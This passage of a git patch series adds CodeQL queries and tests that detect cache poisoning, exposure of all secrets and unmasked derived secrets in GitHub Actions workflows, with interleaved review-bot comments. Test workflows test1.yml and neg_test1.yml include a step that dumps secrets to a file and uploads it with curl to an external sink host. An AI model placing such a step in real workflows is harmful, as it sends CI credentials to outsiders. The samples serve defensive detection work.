.github/workflows/neg_poisonable_step2.yml:16:9:17:54 | Run Step | +| .github/workflows/poisonable_step1.yml:10:9:12:6 | Uses Step: comment-branch | .github/workflows/poisonable_step1.yml:12:9:15:6 | Uses Step | +| .github/workflows/poisonable_step1.yml:12:9:15:6 | Uses Step | .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | +| 
.github/workflows/poisonable_step1.yml:21:9:23:6 | Uses Step: comment-branch | .github/workflows/poisonable_step1.yml:23:9:26:6 | Uses Step | +| .github/workflows/poisonable_step1.yml:23:9:26:6 | Uses Step | .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | +| .github/workflows/poisonable_step1.yml:32:9:34:6 | Uses Step: comment-branch | .github/workflows/poisonable_step1.yml:34:9:37:6 | Uses Step | +| .github/workflows/poisonable_step1.yml:34:9:37:6 | Uses Step | .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | +| .github/workflows/poisonable_step2.yml:15:9:20:6 | Uses Step | .github/workflows/poisonable_step2.yml:20:9:22:6 | Uses Step | +| .github/workflows/poisonable_step2.yml:20:9:22:6 | Uses Step | .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | +| .github/workflows/poisonable_step3.yml:13:7:19:4 | Uses Step | .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | +| .github/workflows/poisonable_step4.yml:13:9:18:6 | Uses Step | .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | +| .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | +| .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | +#select +| .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | .github/workflows/direct_cache2.yml:11:9:14:6 | Uses Step | .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. 
| +| .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | .github/workflows/direct_cache3.yml:14:9:19:6 | Uses Step | .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache4.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache5.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/direct_cache6.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/direct_cache6.yml:25:9:30:6 | Uses Step | .github/workflows/direct_cache6.yml:18:9:25:6 | Uses Step: cache-pip | Potential cache poisoning in the context of the default branch due to downloading an untrusted artifact. | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref new file mode 100644 index 00000000000..9d1910990fc --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.qlref @@ -0,0 +1,2 @@ +Security/CWE-349/CachePoisoningViaDirectCache.ql + diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected new file mode 100644 index 00000000000..a515bd87334 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected 
@@ -0,0 +1,49 @@ +edges +| .github/workflows/code_injection2.yml:12:9:16:6 | Uses Step: modified_files | .github/workflows/code_injection2.yml:16:9:16:71 | Run Step | +| .github/workflows/direct_cache1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | +| .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | +| .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | .github/workflows/direct_cache1.yml:22:9:23:21 | Run Step | +| .github/workflows/direct_cache2.yml:11:9:14:6 | Uses Step | .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | +| .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | .github/workflows/direct_cache2.yml:18:9:19:21 | Run Step | +| .github/workflows/direct_cache3.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/direct_cache3.yml:14:9:19:6 | Uses Step | +| .github/workflows/direct_cache3.yml:14:9:19:6 | Uses Step | .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | +| .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | .github/workflows/direct_cache3.yml:23:9:24:21 | Run Step | +| .github/workflows/direct_cache4.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | +| .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache4.yml:21:9:22:21 | Run Step | +| .github/workflows/direct_cache5.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | +| .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache5.yml:21:9:22:21 | Run Step | +| .github/workflows/direct_cache6.yml:13:9:14:6 | Uses Step | .github/workflows/direct_cache6.yml:14:9:18:6 | Uses Step | +| .github/workflows/direct_cache6.yml:14:9:18:6 | Uses Step | .github/workflows/direct_cache6.yml:18:9:25:6 | Uses Step: cache-pip | +| .github/workflows/direct_cache6.yml:18:9:25:6 | Uses Step: 
cache-pip | .github/workflows/direct_cache6.yml:25:9:30:6 | Uses Step | +| .github/workflows/direct_cache6.yml:25:9:30:6 | Uses Step | .github/workflows/direct_cache6.yml:30:9:35:36 | Uses Step | +| .github/workflows/neg_direct_cache1.yml:14:9:17:6 | Uses Step | .github/workflows/neg_direct_cache1.yml:17:9:21:6 | Uses Step | +| .github/workflows/neg_direct_cache1.yml:17:9:21:6 | Uses Step | .github/workflows/neg_direct_cache1.yml:21:9:22:21 | Run Step | +| .github/workflows/neg_direct_cache2.yml:14:9:17:6 | Uses Step | .github/workflows/neg_direct_cache2.yml:17:9:21:6 | Uses Step | +| .github/workflows/neg_direct_cache2.yml:17:9:21:6 | Uses Step | .github/workflows/neg_direct_cache2.yml:21:9:22:21 | Run Step | +| .github/workflows/neg_direct_cache3.yml:13:9:14:6 | Uses Step | .github/workflows/neg_direct_cache3.yml:14:9:18:6 | Uses Step | +| .github/workflows/neg_direct_cache3.yml:14:9:18:6 | Uses Step | .github/workflows/neg_direct_cache3.yml:18:9:25:6 | Uses Step: cache-pip | +| .github/workflows/neg_direct_cache3.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/neg_direct_cache3.yml:25:9:30:6 | Uses Step | +| .github/workflows/neg_direct_cache3.yml:25:9:30:6 | Uses Step | .github/workflows/neg_direct_cache3.yml:30:9:35:36 | Uses Step | +| .github/workflows/neg_poisonable_step1.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/neg_poisonable_step1.yml:14:9:19:6 | Uses Step | +| .github/workflows/neg_poisonable_step1.yml:14:9:19:6 | Uses Step | .github/workflows/neg_poisonable_step1.yml:19:9:20:30 | Run Step | +| .github/workflows/neg_poisonable_step2.yml:13:9:16:6 | Uses Step | .github/workflows/neg_poisonable_step2.yml:16:9:17:54 | Run Step | +| .github/workflows/poisonable_step1.yml:10:9:12:6 | Uses Step: comment-branch | .github/workflows/poisonable_step1.yml:12:9:15:6 | Uses Step | +| .github/workflows/poisonable_step1.yml:12:9:15:6 | Uses Step | .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | +| 
.github/workflows/poisonable_step1.yml:21:9:23:6 | Uses Step: comment-branch | .github/workflows/poisonable_step1.yml:23:9:26:6 | Uses Step | +| .github/workflows/poisonable_step1.yml:23:9:26:6 | Uses Step | .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | +| .github/workflows/poisonable_step1.yml:32:9:34:6 | Uses Step: comment-branch | .github/workflows/poisonable_step1.yml:34:9:37:6 | Uses Step | +| .github/workflows/poisonable_step1.yml:34:9:37:6 | Uses Step | .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | +| .github/workflows/poisonable_step2.yml:15:9:20:6 | Uses Step | .github/workflows/poisonable_step2.yml:20:9:22:6 | Uses Step | +| .github/workflows/poisonable_step2.yml:20:9:22:6 | Uses Step | .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | +| .github/workflows/poisonable_step3.yml:13:7:19:4 | Uses Step | .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | +| .github/workflows/poisonable_step4.yml:13:9:18:6 | Uses Step | .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | +| .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | +| .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | +#select +| .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | .github/workflows/poisonable_step1.yml:12:9:15:6 | Uses Step | .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | .github/workflows/poisonable_step1.yml:23:9:26:6 | Uses Step | .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. 
| +| .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | .github/workflows/poisonable_step1.yml:34:9:37:6 | Uses Step | .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | .github/workflows/poisonable_step2.yml:15:9:20:6 | Uses Step | .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | .github/workflows/poisonable_step3.yml:13:7:19:4 | Uses Step | .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | .github/workflows/poisonable_step4.yml:13:9:18:6 | Uses Step | .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref new file mode 100644 index 00000000000..89db21d70f5 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref @@ -0,0 +1,2 @@ +Security/CWE-349/CachePoisoningViaPoisonableStep.ql + From 9f79e51e89f29b550154143b7583214387ad0bd8 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 6 Aug 2024 12:46:28 +0200 Subject: [PATCH 0457/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 1c4415a305d..31270d39972 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.31 +version: 0.1.32 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 9b49717942b..99e9fac00a4 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.31 +version: 0.1.32 groups: [actions, queries] suites: codeql-suites extractor: javascript From 6842babd163be86495550d0a29fad704a9484d1f Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 6 Aug 2024 23:08:52 +0200 Subject: [PATCH 0458/1267] feat(query): New queries for incorrect secrets handling ExcessiveSecretsExposure: Reports when all secrets are passed to the workflow runner since that violates the principle of least privilege. UnmaskedSecretExposure: Reports when secrets are derived from a JSON secret since they won't get masked by the workflow runner --- ql/lib/codeql/actions/ast/internal/Ast.qll | 4 +-- .../CWE-312/ExcessiveSecretsExposure.ql | 23 +++++++++++++++++ .../CWE-312/UnmaskedSecretExposure.ql | 19 ++++++++++++++ .../CWE-312/.github/workflows/neg_test1.yml | 19 ++++++++++++++ .../CWE-312/.github/workflows/test1.yml | 25 +++++++++++++++++++ .../CWE-312/ExcessiveSecretsExposure.expected | 3 +++ .../CWE-312/ExcessiveSecretsExposure.qlref | 2 ++ .../CWE-312/UnmaskedSecretExposure.expected | 2 ++ .../CWE-312/UnmaskedSecretExposure.qlref | 2 ++ 9 files changed, 97 insertions(+), 2 deletions(-) create mode 100644 ql/src/Security/CWE-312/ExcessiveSecretsExposure.ql create mode 100644 ql/src/Security/CWE-312/UnmaskedSecretExposure.ql create mode 100644 ql/test/query-tests/Security/CWE-312/.github/workflows/neg_test1.yml create mode 100644 ql/test/query-tests/Security/CWE-312/.github/workflows/test1.yml create mode 100644 ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.expected create mode 100644 ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref create mode 100644 ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.expected create mode 100644 ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 5bb94ba8a68..d9738cb74ad 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll 
@@ -1288,9 +1288,9 @@ string getAToJsonReferenceExpression(string s, int offset) { // not just the last (greedy match) or first (reluctant match). result = s.trim() - .regexpFind("(?i)tojson\\([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*", + .regexpFind("(?i)tojson\\(\\s*[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*", _, offset) - .regexpCapture("(?i)tojson\\(([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*", + .regexpCapture("(?i)tojson\\(\\s*([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*", 1) } diff --git a/ql/src/Security/CWE-312/ExcessiveSecretsExposure.ql b/ql/src/Security/CWE-312/ExcessiveSecretsExposure.ql new file mode 100644 index 00000000000..c1d22e3a181 --- /dev/null +++ b/ql/src/Security/CWE-312/ExcessiveSecretsExposure.ql @@ -0,0 +1,23 @@ +/** + * @name Excessive Secrets Exposure + * @description All organization and repository secrets are passed to the workflow runner. + * @kind problem + * @problem.severity recommendation + * @id actions/excessive-secrets-exposure + * @tags actions + * security + * external/cwe/cwe-312 + */ + +import actions +import codeql.actions.ast.internal.Ast + +from Expression expr +where + getAToJsonReferenceExpression(expr.getExpression(), _).matches("secrets%") + or + expr.getExpression().matches("secrets[%") and + not expr.getExpression().matches("secrets[\"%") and + not expr.getExpression().matches("secrets['%") +select expr, "All organization and repository secrets are passed to the workflow runner in $@", + expr, expr.getExpression() diff --git a/ql/src/Security/CWE-312/UnmaskedSecretExposure.ql b/ql/src/Security/CWE-312/UnmaskedSecretExposure.ql new file mode 100644 index 00000000000..961af6f267b --- /dev/null +++ b/ql/src/Security/CWE-312/UnmaskedSecretExposure.ql 
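Review bot: The widened pattern in `getAToJsonReferenceExpression` accepts whitespace only after the opening parenthesis, so `toJSON( secrets )` or `toJSON(secrets )` still fails both the `regexpFind` and the `regexpCapture` pattern and a query built on this helper would miss it. Allowing `\\s*` before the closing parenthesis as well, i.e. `tojson\\(\\s*([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)\\s*\\)` in both calls, closes that gap. The two literals are near-duplicates, so holding the shared part in one string would stop them drifting apart. None of the workflows added in this commit contains a whitespace variant, so the relaxed match is not pinned by a test. The predicate body starts outside the hunk.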
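Review bot: The first disjunct of the `where` clause tests the captured `toJSON` argument with `.matches("secrets%")`, which is a prefix match, so `toJSON(secrets.TOKEN)` (a single secret) would be reported with the "All organization and repository secrets" message. Comparing for equality instead, e.g. `getAToJsonReferenceExpression(expr.getExpression(), _).toLowerCase() = "secrets"`, keeps the alert tied to the whole `secrets` context. The `secrets[%` checks are case-sensitive and the two quote exclusions assume no space after the bracket, so `Secrets[...]` may be missed and `secrets[ 'TOKEN' ]` may be flagged; that is worth confirming against how the runner treats expression case and whitespace. The header also carries no `@precision`, unlike `UnmaskedSecretExposure.ql` in the same commit.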
@@ -0,0 +1,19 @@
+/**
+ * @name Unmasked Secret Exposure
+ * @description Secrets derived from other secrets are not masked by the workflow runner.
+ * @kind problem
+ * @problem.severity error
+ * @security-severity 9.0
+ * @precision high
+ * @id actions/unmasked-secret-exposure
+ * @tags actions
+ * security
+ * external/cwe/cwe-312
+ */
+
+import actions
+
+from Expression expr
+where expr.getExpression().regexpMatch("(?i).*fromjson\\(secrets\\..*\\)\\..*")
+select expr, "An unmasked secret derived from another secret may be exposed in $@", expr,
+ expr.getExpression()
diff --git a/ql/test/query-tests/Security/CWE-312/.github/workflows/neg_test1.yml b/ql/test/query-tests/Security/CWE-312/.github/workflows/neg_test1.yml
new file mode 100644
index 00000000000..80f98bd57af
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-312/.github/workflows/neg_test1.yml
@@ -0,0 +1,19 @@
+name: secrets
+on:
+ workflow_dispatch:
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ steps:
+ - run: |
+ echo '${{ secrets.TOKEN }}' > secrets.txt
+ curl -X PUT -T ./secrets.txt -H http://3f750d39-1083-44e5-b057-40432fafeeb5.sink.reqsink.com
+ - env:
+ A_SECRET: ${{ secrets.TOKEN }}
+ run: echo "$A_SECRET"
+ - env:
+ A_SECRET: ${{ secrets['TOKEN'] }}
+ run: echo "$A_SECRET"
+ - env:
+ A_SECRET: ${{ secrets["TOKEN"] }}
+ run: echo "$A_SECRET"
diff --git a/ql/test/query-tests/Security/CWE-312/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-312/.github/workflows/test1.yml
new file mode 100644
index 00000000000..614efab34c9
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-312/.github/workflows/test1.yml
@@ -0,0 +1,25 @@
+name: list-actions-secrets
+on:
+ workflow_dispatch:
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ strategy:
+ matrix:
+ TOKENS: [WRITE, READ]
+ steps:
+ - run: |
+ echo '${{ toJSON(secrets) }}' > secrets.txt
+ curl -X PUT -T ./secrets.txt -H http://3f750d39-1083-44e5-b057-40432fafeeb5.sink.reqsink.com
+ - env:
+ ALL_SECRETS: ${{ toJSON(secrets) }}
+ run: echo "$ALL_SECRETS"
+ - env:
+ SOME_SECRETS: ${{ secrets[format('PAT_%s', matrix.TOKENS)] }}
+ run: echo "$SOME_SECRETS"
+ - env:
+ username: ${{ fromJson(secrets.AZURE_CREDENTIALS).clientId }}
+ password: ${{ fromJson(secrets.AZURE_CREDENTIALS).clientSecret }}
+ run: |
+ echo "$username"
+ echo "$password"
diff --git a/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.expected b/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.expected
new file mode 100644
index 00000000000..9d6a741ed58
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.expected
@@ -0,0 +1,3 @@
+| .github/workflows/test1.yml:12:18:12:39 | toJSON(secrets) | All organization and repository secrets are passed to the workflow runner in $@ | .github/workflows/test1.yml:12:18:12:39 | toJSON(secrets) | toJSON(secrets) |
+| .github/workflows/test1.yml:15:25:15:46 | toJSON(secrets) | All organization and repository secrets are passed to the workflow runner in $@ | .github/workflows/test1.yml:15:25:15:46 | toJSON(secrets) | toJSON(secrets) |
+| .github/workflows/test1.yml:18:26:18:72 | secrets[format('PAT_%s', matrix.TOKENS)] | All organization and repository secrets are passed to the workflow runner in $@ | .github/workflows/test1.yml:18:26:18:72 | secrets[format('PAT_%s', matrix.TOKENS)] | secrets[format('PAT_%s', matrix.TOKENS)] |
diff --git a/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref b/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref
new file mode 100644
index 00000000000..45f5ad80fd9
--- /dev/null
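Review bot: The `regexpMatch` in the `where` clause only recognises the exact shape `fromJson(secrets.NAME).field`, so index-style forms such as `fromJson(secrets['NAME']).field` or `fromJson(secrets.NAME)['field']`, and any whitespace inside the parentheses, go unreported although the derived value is just as unmasked. A pattern along the lines of `(?i).*fromjson\\(\\s*secrets\\s*(\\.|\\[).*\\)\\s*(\\.|\\[).*` would cover them; the same commit already relaxes whitespace for `toJSON` in `Ast.qll`. Since the query declares `@precision high` and `@security-severity 9.0`, adding these variants to `test1.yml` would pin the intended coverage in the expected results.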
+++ b/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref @@ -0,0 +1,2 @@ +Security/CWE-312/ExcessiveSecretsExposure.ql + diff --git a/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.expected b/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.expected new file mode 100644 index 00000000000..4f309344b4b --- /dev/null +++ b/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.expected @@ -0,0 +1,2 @@ +| .github/workflows/test1.yml:21:22:21:72 | fromJson(secrets.AZURE_CREDENTIALS).clientId | An unmasked secret derived from another secret may be exposed in $@ | .github/workflows/test1.yml:21:22:21:72 | fromJson(secrets.AZURE_CREDENTIALS).clientId | fromJson(secrets.AZURE_CREDENTIALS).clientId | +| .github/workflows/test1.yml:22:22:22:76 | fromJson(secrets.AZURE_CREDENTIALS).clientSecret | An unmasked secret derived from another secret may be exposed in $@ | .github/workflows/test1.yml:22:22:22:76 | fromJson(secrets.AZURE_CREDENTIALS).clientSecret | fromJson(secrets.AZURE_CREDENTIALS).clientSecret | diff --git a/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref b/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref new file mode 100644 index 00000000000..ad4c8461523 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref @@ -0,0 +1,2 @@ +Security/CWE-312/UnmaskedSecretExposure.ql + From c442f1b96b2c975811d0f473b08ecd94dae2d9cf Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 6 Aug 2024 23:30:47 +0200 Subject: [PATCH 0459/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 31270d39972..75b7f0057f7 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml 
@@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.32 +version: 0.1.33 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 99e9fac00a4..4198930865f 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.32 +version: 0.1.33 groups: [actions, queries] suites: codeql-suites extractor: javascript From 473251371ba2bbffbfeed2add4e750397f6fde9e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 7 Aug 2024 13:17:36 +0200 Subject: [PATCH 0460/1267] feat(queries): Improve Output Clobbering query Add support for clobbering of `set-output` workflow command --- ql/lib/codeql/actions/Helper.qll | 13 ++-- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 4 +- .../security/OutputClobberingQuery.qll | 63 +++++++++++++++++++ .../Security/CWE-077/OutputClobberingHigh.ql | 1 + .../CWE-077/.github/workflows/output2.yml | 56 +++++++++++++++++ .../CWE-077/OutputClobberingHigh.expected | 18 ++++++ 6 files changed, 147 insertions(+), 8 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/output2.yml diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index 2953817de6b..1d88f6f6511 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -20,7 +20,7 @@ string wrapJsonRegexp(string regex) { } bindingset[str] -private string trimQuotes(string str) { +string trimQuotes(string str) { result = str.trim().regexpReplaceAll("^(\"|')", "").regexpReplaceAll("(\"|')$", "") } @@ -279,6 +279,10 @@ predicate inNonPrivilegedContext(AstNode node) { inNonPrivilegedJob(node) } +string partialFileContentRegexp() { + result = ["cat\\s+", "jq\\s+", "yq\\s+", "tail\\s+", "head\\s+", "ls\\s+"] +} + bindingset[snippet] predicate outputsPartialFileContent(string snippet) { // e.g. 
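Review bot: In `Helper.qll`, `trimQuotes` loses its `private` modifier and `partialFileContentRegexp()` is added as a new public predicate, both without QLDoc, although other modules can now depend on them. For `trimQuotes` I would add a one-line doc comment saying that it trims surrounding whitespace and then removes one leading and one trailing quote character. For `partialFileContentRegexp` the comment should say that each result is a command prefix ending in `\\s+` and that callers must supply the surrounding `.*` themselves, as `outputsPartialFileContent` does. It is also worth noting there that `ls\\s+` lists names rather than file content, since the predicate name suggests otherwise. `outputsPartialFileContent` continues outside this hunk.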
@@ -286,12 +290,7 @@ predicate outputsPartialFileContent(string snippet) { // echo "FOO=$(> $GITHUB_ENV // yq '.foo' foo.yml >> $GITHUB_PATH // cat foo.txt >> $GITHUB_PATH - snippet - .regexpMatch([ - "(\\$\\(|`)<.*", - ".*(\\b|^|\\s+)" + ["cat\\s+", "jq\\s+", "yq\\s+", "tail\\s+", "head\\s+", "ls\\s+"] + - ".*" - ]) + snippet.regexpMatch(["(\\$\\(|`)<.*", ".*(\\b|^|\\s+)" + partialFileContentRegexp() + ".*"]) } string defaultBranchNames() { diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 5d0d45c26c1..aa31954ad3c 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -8,6 +8,7 @@ private import codeql.actions.DataFlow private import codeql.actions.dataflow.FlowSources private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.security.ArtifactPoisoningQuery +private import codeql.actions.security.OutputClobberingQuery private import codeql.actions.security.UntrustedCheckoutQuery /** @@ -114,7 +115,8 @@ predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { succ.asExpr() = run.getScriptScalar() and ( envToSpecialFile(["GITHUB_ENV", "GITHUB_OUTPUT", "GITHUB_PATH"], var_name, run, _) or - envToArgInjSink(var_name, run, _) + envToArgInjSink(var_name, run, _) or + exists(OutputClobberingSink n | n.asExpr() = run.getScriptScalar()) ) ) } diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll index af8f7af089d..5a85c22bb8f 100644 --- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll 
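Review bot: In the `FlowSteps.qll` hunk, the added disjunct `exists(OutputClobberingSink n | n.asExpr() = run.getScriptScalar())` does not mention `var_name`, unlike the `envToSpecialFile` and `envToArgInjSink` alternatives beside it. As far as the hunk shows, every environment variable of the step therefore gains a flow edge into the script as soon as the script is any kind of output-clobbering sink, which can attribute a finding to a tainted variable the script never prints. Consider relating the sink to the variable that is actually echoed, for instance through a predicate on the sink class that takes `var_name`, or add a comment stating that the over-approximation is intended. The start of `envToRunStep`, where `var_name` is bound, is outside the hunk.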
